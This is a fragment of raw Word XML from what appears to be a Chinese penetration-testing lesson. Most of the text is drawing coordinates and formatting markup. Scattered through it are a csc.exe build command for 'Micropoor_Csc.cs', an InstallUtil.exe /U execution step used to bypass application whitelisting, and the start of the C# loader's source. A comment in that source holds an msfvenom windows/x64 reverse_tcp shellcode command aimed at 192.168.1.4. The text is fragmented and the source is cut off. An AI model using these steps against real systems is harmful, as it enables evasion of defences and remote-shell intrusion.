,1510,14937,1510,14933,1510,14929,1510,14924,1510,14920,1510,14915,1510,14911,1510,14906,1510,14901,1510,14896,1510,14891,1510,14886,1510,14880,1510,14875,1510,14869,1510,14863,1510,14857,1510,14852,1510,14845,1510,14839,1510,14833,1510,14826,1510,14820,1510,14813,1510,14806,1510,14799,1510,14792,1510,14785,1510,14777,1510,14770,1510,14762,1510,14754,1510,14746,1510,14738,1510,14730,1510,14722,1510,14713,1510,14704,1510,14695,1510,14686e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:733.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14670" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:14670;width:30;height:370" coordorigin="1490,14670" coordsize="30,370" path="m1517,14686l1517,14686,1517,14686,1517,14686,1517,14686,1517,14686,1517,14686,1517,14686,1517,14686,1517,14687,1517,14687,1517,14687,1517,14687,1517,14687,1517,14687,1517,14687,1517,14687,1517,14687,1517,14687,1517,14688,1517,14688,1517,14688,1517,14688,1517,14689,1517,14689,1517,14689,1517,14690,1517,14690,1517,14691,1517,14691,1517,14692,1517,14692,1517,14693,1517,14693,1517,14694,1517,14695,1517,14696,1517,14696,1517,14697,1517,14698,1517,14699,1517,14700,1517,14701,1517,14702,1517,14703,1517,14705,1517,14706,1517,14707,1517,14709,1517,14710,1517,14712,1517,14713,1517,14715,1517,14716,1517,14718,1517,14720,1517,14722,1517,14724,1517,14726,1517,14728,1517,14730,1517,14733,1517,14735,1517,14737,1517,14740,1517,14742,1517,14745,1517,14748,1517,14751,1517,14754,1517,14757,1517,14760,1517,14763,1517,14766,1517,14770,1517,14773,1517,14777,1517,14780,1517,14784,1517,14788,1517,14792,1517,14796,1517,14800,1517,14804,1517,14809,1517,14813,1517,14818,1517,14822,1517,14827,1517,14832,1517,14837,1517,14842,1517,14847,1517,14853,1517,14858,1517,14864,1517,14870,1517,14876,1517,14881,1517,14888,1517,14894,1517,14900,1517,14907,1517,14913,1517,14920,1517,14927,1517,14934,1517,14941,1517,14948,1517,14956,1517,14963,1517,14971,1517,14979,1517,14987,1517,14995,1517,15003,1517,15011,1517,15020,1517,15029,1517,15038,1517,15047e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:751.500pt;width:449.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15030" coordsize="8990,330">
        <v:shape style="position:absolute;left:1490;top:15030;width:8990;height:330" coordorigin="1490,15030" coordsize="8990,330" path="m1510,15047l1510,15047,1510,15047,1510,15047,1510,15047,1510,15047,1510,15047,1511,15047,1512,15047,1512,15047,1514,15047,1515,15047,1517,15047,1519,15047,1521,15047,1524,15047,1528,15047,1532,15047,1536,15047,1541,15047,1546,15047,1552,15047,1559,15047,1566,15047,1575,15047,1583,15047,1593,15047,1603,15047,1615,15047,1627,15047,1640,15047,1654,15047,1668,15047,1684,15047,1701,15047,1719,15047,1738,15047,1758,15047,1780,15047,1802,15047,1826,15047,1851,15047,1877,15047,1904,15047,1933,15047,1963,15047,1995,15047,2028,15047,2063,15047,2099,15047,2136,15047,2175,15047,2216,15047,2259,15047,2303,15047,2348,15047,2396,15047,2445,15047,2496,15047,2549,15047,2604,15047,2660,15047,2719,15047,2779,15047,2841,15047,2906,15047,2972,15047,3041,15047,3112,15047,3184,15047,3259,15047,3336,15047,3416,15047,3498,15047,3582,15047,3668,15047,3757,15047,3848,15047,3941,15047,4037,15047,4136,15047,4236,15047,4340,15047,4446,15047,4555,15047,4666,15047,4780,15047,4897,15047,5017,15047,5139,15047,5264,15047,5392,15047,5523,15047,5657,15047,5793,15047,5933,15047,6076,15047,6222,15047,6370,15047,6522,15047,6677,15047,6835,15047,6997,15047,7161,15047,7329,15047,7500,15047,7675,15047,7853,15047,8034,15047,8219,15047,8407,15047,8598,15047,8793,15047,8992,15047,9194,15047,9400,15047,9609,15047,9823,15047,10039,15047,10260,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15047,10484,15048,10484,15048,10484,15048,10484,15048,10484,15048,10484,15049,10484,15049,10484,15049,10484,15050,10484,15050,10484,15050,10484,15051,10484,15051,10484,15052,10484,15052,10484,15053,10484,15054,10484,15054,10484,15055,10484,15056,10484,15057,10484,15057,10484,15058,10484,15059,10484,15060,10484,15061,10484,15062,10484,15063,10484,15064,10484,15066,10484,15067,10484,15068,10484,15070,10484,15071,10484,15073,10484,15074,10484,15076,10484,15077,10484,15079,10484,15081,10484,15083,10484,15085,10484,15087,10484,15089,10484,15091,10484,15093,10484,15096,10484,15098,10484,15100,10484,15103,10484,15106,10484,15108,10484,15111,10484,15114,10484,15117,10484,15120,10484,15123,10484,15126,10484,15129,10484,15133,10484,15136,10484,15140,10484,15143,10484,15147,10484,15151,10484,15155,10484,15159,10484,15163,10484,15167,10484,15171,10484,15176,10484,15180,10484,15185,10484,15189,10484,15194,10484,15199,10484,15204,10484,15209,10484,15215,10484,15220,10484,15225,10484,15231,10484,15237,10484,15243,10484,15248,10484,15255,10484,15261,10484,15267,10484,15273,10484,15280,10484,15287,10484,15293,10484,15300,10484,15307,10484,15315,10484,15322,10484,15329,10484,15337,10484,15345,10484,15352,10484,15360,10484,15368,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10483,15377,10482,15377,10482,15377,10480,15377,10479,15377,10477,15377,10475,15377,10473,15377,10470,15377,10466,15377,10462,15377,10458,15377,10453,15377,10448,15377,10442,15377,10435,15377,10428,15377,10419,15377,10411,15377,10401,15377,10391,15377,10379,15377,10367,15377,10354,15377,10340,15377,10326,15377,10310,15377,10293,15377,10275,15377,10256,15377,10236,15377,10215,15377,10192,15377,10168,15377,10143,15377,10117,15377,10090,15377,10061,15377,10031,15377,9999,15377,9966,15377,9931,15377,9895,15377,9858,15377,9819,15377,9778,15377,9735,15377,9691,15377,9646,15377,9598,15377,9549,15377,9498,15377,9445,15377,9391,15377,9334,15377,9275,15377,9215,15377,9153,15377,9088,15377,9022,15377,8953,15377,8883,15377,8810,15377,8735,15377,8658,15377,8578,15377,8497,15377,8413,15377,8326,15377,8238,15377,8146,15377,8053,15377,7957,15377,7859,15377,7758,15377,7654,15377,7548,15377,7439,15377,7328,15377,7214,15377,7097,15377,6977,15377,6855,15377,6730,15377,6602,15377,6471,15377,6337,15377,6201,15377,6061,15377,5918,15377,5773,15377,5624,15377,5472,15377,5317,15377,5159,15377,4997,15377,4833,15377,4665,15377,4494,15377,4319,15377,4141,15377,3960,15377,3776,15377,3587,15377,3396,15377,3201,15377,3002,15377,2800,15377,2594,15377,2385,15377,2172,15377,1955,15377,1734,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15376,1510,15376,1510,15376,1510,15376,1510,15376,1510,15376,1510,15376,1510,15376,1510,15375,1510,15375,1510,15375,1510,15375,1510,15374,1510,15374,1510,15374,1510,15373,1510,15373,1510,15372,1510,15372,1510,15371,1510,15371,1510,15370,1510,15370,1510,15369,1510,15368,1510,15368,1510,15367,1510,15366,1510,15365,1510,15364,1510,15363,1510,15362,1510,15361,1510,15360,1510,15359,1510,15358,1510,15356,1510,15355,1510,15354,1510,15352,1510,15351,1510,15349,1510,15348,1510,15346,1510,15344,1510,15342,1510,15340,1510,15339,1510,15337,1510,15334,1510,15332,1510,15330,1510,15328,1510,15325,1510,15323,1510,15320,1510,15318,1510,15315,1510,15312,1510,15310,1510,15307,1510,15304,1510,15301,1510,15297,1510,15294,1510,15291,1510,15287,1510,15284,1510,15280,1510,15276,1510,15273,1510,15269,1510,15265,1510,15261,1510,15256,1510,15252,1510,15248,1510,15243,1510,15239,1510,15234,1510,15229,1510,15224,1510,15219,1510,15214,1510,15209,1510,15203,1510,15198,1510,15192,1510,15187,1510,15181,1510,15175,1510,15169,1510,15163,1510,15156,1510,15150,1510,15143,1510,15137,1510,15130,1510,15123,1510,15116,1510,15109,1510,15101,1510,15094,1510,15086,1510,15079,1510,15071,1510,15063,1510,15055,1510,15047e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:751.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15030" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:15030;width:30;height:350" coordorigin="1490,15030" coordsize="30,350" path="m1517,15047l1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15047,1517,15048,1517,15048,1517,15048,1517,15048,1517,15048,1517,15049,1517,15049,1517,15049,1517,15050,1517,15050,1517,15050,1517,15051,1517,15051,1517,15052,1517,15052,1517,15053,1517,15054,1517,15054,1517,15055,1517,15056,1517,15057,1517,15057,1517,15058,1517,15059,1517,15060,1517,15061,1517,15062,1517,15063,1517,15064,1517,15066,1517,15067,1517,15068,1517,15070,1517,15071,1517,15073,1517,15074,1517,15076,1517,15077,1517,15079,1517,15081,1517,15083,1517,15085,1517,15087,1517,15089,1517,15091,1517,15093,1517,15096,1517,15098,1517,15100,1517,15103,1517,15106,1517,15108,1517,15111,1517,15114,1517,15117,1517,15120,1517,15123,1517,15126,1517,15129,1517,15133,1517,15136,1517,15140,1517,15143,1517,15147,1517,15151,1517,15155,1517,15159,1517,15163,1517,15167,1517,15171,1517,15176,1517,15180,1517,15185,1517,15189,1517,15194,1517,15199,1517,15204,1517,15209,1517,15215,1517,15220,1517,15225,1517,15231,1517,15237,1517,15243,1517,15248,1517,15255,1517,15261,1517,15267,1517,15273,1517,15280,1517,15287,1517,15293,1517,15300,1517,15307,1517,15315,1517,15322,1517,15329,1517,15337,1517,15345,1517,15352,1517,15360,1517,15368,1517,15377e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:767.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15350" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15350;width:8990;height:370" coordorigin="1490,15350" coordsize="8990,370" path="m1510,15377l1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1510,15377,1511,15377,1512,15377,1512,15377,1514,15377,1515,15377,1517,15377,1519,15377,1521,15377,1524,15377,1528,15377,1532,15377,1536,15377,1541,15377,1546,15377,1552,15377,1559,15377,1566,15377,1575,15377,1583,15377,1593,15377,1603,15377,1615,15377,1627,15377,1640,15377,1654,15377,1668,15377,1684,15377,1701,15377,1719,15377,1738,15377,1758,15377,1780,15377,1802,15377,1826,15377,1851,15377,1877,15377,1904,15377,1933,15377,1963,15377,1995,15377,2028,15377,2063,15377,2099,15377,2136,15377,2175,15377,2216,15377,2259,15377,2303,15377,2348,15377,2396,15377,2445,15377,2496,15377,2549,15377,2604,15377,2660,15377,2719,15377,2779,15377,2841,15377,2906,15377,2972,15377,3041,15377,3112,15377,3184,15377,3259,15377,3336,15377,3416,15377,3498,15377,3582,15377,3668,15377,3757,15377,3848,15377,3941,15377,4037,15377,4136,15377,4236,15377,4340,15377,4446,15377,4555,15377,4666,15377,4780,15377,4897,15377,5017,15377,5139,15377,5264,15377,5392,15377,5523,15377,5657,15377,5793,15377,5933,15377,6076,15377,6222,15377,6370,15377,6522,15377,6677,15377,6835,15377,6997,15377,7161,15377,7329,15377,7500,15377,7675,15377,7853,15377,8034,15377,8219,15377,8407,15377,8598,15377,8793,15377,8992,15377,9194,15377,9400,15377,9609,15377,9823,15377,10039,15377,10260,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15377,10484,15378,10484,15378,10484,15378,10484,15378,10484,15378,10484,15379,10484,15379,10484,15379,10484,15380,10484,15380,10484,15381,10484,15381,10484,15381,10484,15382,10484,15383,10484,15383,10484,15384,10484,15384,10484,15385,10484,15386,10484,15387,10484,15388,10484,15388,10484,15389,10484,15390,10484,15391,10484,15393,10484,15394,10484,15395,10484,15396,10484,15398,10484,15399,10484,15400,10484,15402,10484,15403,10484,15405,10484,15407,10484,15409,10484,15410,10484,15412,10484,15414,10484,15416,10484,15418,10484,15421,10484,15423,10484,15425,10484,15428,10484,15430,10484,15433,10484,15435,10484,15438,10484,15441,10484,15444,10484,15447,10484,15450,10484,15453,10484,15457,10484,15460,10484,15463,10484,15467,10484,15471,10484,15474,10484,15478,10484,15482,10484,15486,10484,15490,10484,15495,10484,15499,10484,15503,10484,15508,10484,15513,10484,15517,10484,15522,10484,15527,10484,15533,10484,15538,10484,15543,10484,15549,10484,15554,10484,15560,10484,15566,10484,15572,10484,15578,10484,15584,10484,15590,10484,15597,10484,15604,10484,15610,10484,15617,10484,15624,10484,15631,10484,15639,10484,15646,10484,15654,10484,15661,10484,15669,10484,15677,10484,15685,10484,15693,10484,15702,10484,15710,10484,15719,10484,15728,10484,15737,10484,15737,10484,15737,10484,15737,10484,15737,10484,15737,10484,15737,10483,15737,10482,15737,10482,15737,10480,15737,10479,15737,10477,15737,10475,15737,10473,15737,10470,15737,10466,15737,10462,15737,10458,15737,10453,15737,10448,15737,10442,15737,10435,15737,10428,15737,10419,15737,10411,15737,10401,15737,10391,15737,10379,15737,10367,15737,10354,15737,10340,15737,10326,15737,10310,15737,10293,15737,10275,15737,10256,15737,10236,15737,10215,15737,10192,15737,10168,15737,10143,15737,10117,15737,10090,15737,10061,15737,10031,15737,9999,15737,9966,15737,9931,15737,9895,15737,9858,15737,9819,15737,9778,15737,9735,15737,9691,15737,9646,15737,9598,15737,9549,15737,9498,15737,9445,15737,9391,15737,9334,15737,9275,15737,9215,15737,9153,15737,9088,15737,9022,15737,8953,15737,8883,15737,8810,15737,8735,15737,8658,15737,8578,15737,8497,15737,8413,15737,8326,15737,8238,15737,8146,15737,8053,15737,7957,15737,7859,15737,7758,15737,7654,15737,7548,15737,7439,15737,7328,15737,7214,15737,7097,15737,6977,15737,6855,15737,6730,15737,6602,15737,6471,15737,6337,15737,6201,15737,6061,15737,5918,15737,5773,15737,5624,15737,5472,15737,5317,15737,5159,15737,4997,15737,4833,15737,4665,15737,4494,15737,4319,15737,4141,15737,3960,15737,3776,15737,3587,15737,3396,15737,3201,15737,3002,15737,2800,15737,2594,15737,2385,15737,2172,15737,1955,15737,1734,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15737,1510,15736,1510,15736,1510,15736,1510,15736,1510,15736,1510,15736,1510,15735,1510,15735,1510,15735,1510,15735,1510,15734,1510,15734,1510,15734,1510,15733,1510,15733,1510,15732,1510,15732,1510,15731,1510,15731,1510,15730,1510,15729,1510,15729,1510,15728,1510,15727,1510,15726,1510,15725,1510,15724,1510,15723,1510,15722,1510,15721,1510,15720,1510,15719,1510,15717,1510,15716,1510,15715,1510,15713,1510,15712,1510,15710,1510,15709,1510,15707,1510,15705,1510,15703,1510,15701,1510,15699,1510,15697,1510,15695,1510,15693,1510,15691,1510,15688,1510,15686,1510,15683,1510,15681,1510,15678,1510,15675,1510,15673,1510,15670,1510,15667,1510,15664,1510,15660,1510,15657,1510,15654,1510,15650,1510,15647,1510,15643,1510,15639,1510,15636,1510,15632,1510,15627,1510,15623,1510,15619,1510,15615,1510,15610,1510,15606,1510,15601,1510,15596,1510,15591,1510,15586,1510,15581,1510,15576,1510,15570,1510,15565,1510,15559,1510,15554,1510,15548,1510,15542,1510,15536,1510,15530,1510,15523,1510,15517,1510,15510,1510,15503,1510,15497,1510,15490,1510,15482,1510,15475,1510,15468,1510,15460,1510,15452,1510,15445,1510,15437,1510,15429,1510,15420,1510,15412,1510,15403,1510,15395,1510,15386,1510,15377e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:768.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15370" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15370;width:30;height:370" coordorigin="1490,15370" coordsize="30,370" path="m1517,15377l1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15377,1517,15378,1517,15378,1517,15378,1517,15378,1517,15378,1517,15379,1517,15379,1517,15379,1517,15380,1517,15380,1517,15381,1517,15381,1517,15381,1517,15382,1517,15383,1517,15383,1517,15384,1517,15384,1517,15385,1517,15386,1517,15387,1517,15388,1517,15388,1517,15389,1517,15390,1517,15391,1517,15393,1517,15394,1517,15395,1517,15396,1517,15398,1517,15399,1517,15400,1517,15402,1517,15403,1517,15405,1517,15407,1517,15409,1517,15410,1517,15412,1517,15414,1517,15416,1517,15418,1517,15421,1517,15423,1517,15425,1517,15428,1517,15430,1517,15433,1517,15435,1517,15438,1517,15441,1517,15444,1517,15447,1517,15450,1517,15453,1517,15457,1517,15460,1517,15463,1517,15467,1517,15471,1517,15474,1517,15478,1517,15482,1517,15486,1517,15490,1517,15495,1517,15499,1517,15503,1517,15508,1517,15513,1517,15517,1517,15522,1517,15527,1517,15533,1517,15538,1517,15543,1517,15549,1517,15554,1517,15560,1517,15566,1517,15572,1517,15578,1517,15584,1517,15590,1517,15597,1517,15604,1517,15610,1517,15617,1517,15624,1517,15631,1517,15639,1517,15646,1517,15654,1517,15661,1517,15669,1517,15677,1517,15685,1517,15693,1517,15702,1517,15710,1517,15719,1517,15728,1517,15737e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:192.600pt;width:467.400pt;height:189.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14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93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63" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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C:\Windows\Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="17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NET\Framework64\v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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0.30319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\csc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exe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r:System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Ente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rpriseServices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dll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r:System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IO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Compression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dll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target:library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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out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:Mic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opoor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exe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platform:x64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unsafe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C:\Users\John\Desktop\Micropoor_Csc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="26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cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="364" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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C:\Windows\Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="17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NET\Framework64\v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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0.30319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\InstallUtil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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exe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logfi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le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LogToConsole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=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false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U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C:\Users\John\Desktop\Micropoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="20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exe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34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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>与第七十二课相比，p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload更为灵活。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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>附录：Micropo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or_Csc.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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Net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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3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using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System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Diagnostics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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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using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System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Reflection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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5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using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System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Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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Install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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5391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6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using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System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Runtime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InteropServices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;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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="4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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8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9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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfvenom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6e7f8f"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows/x64/shell/reverse_tcp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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST=192.168.1.4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6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT=5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8768" w:firstLine="15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
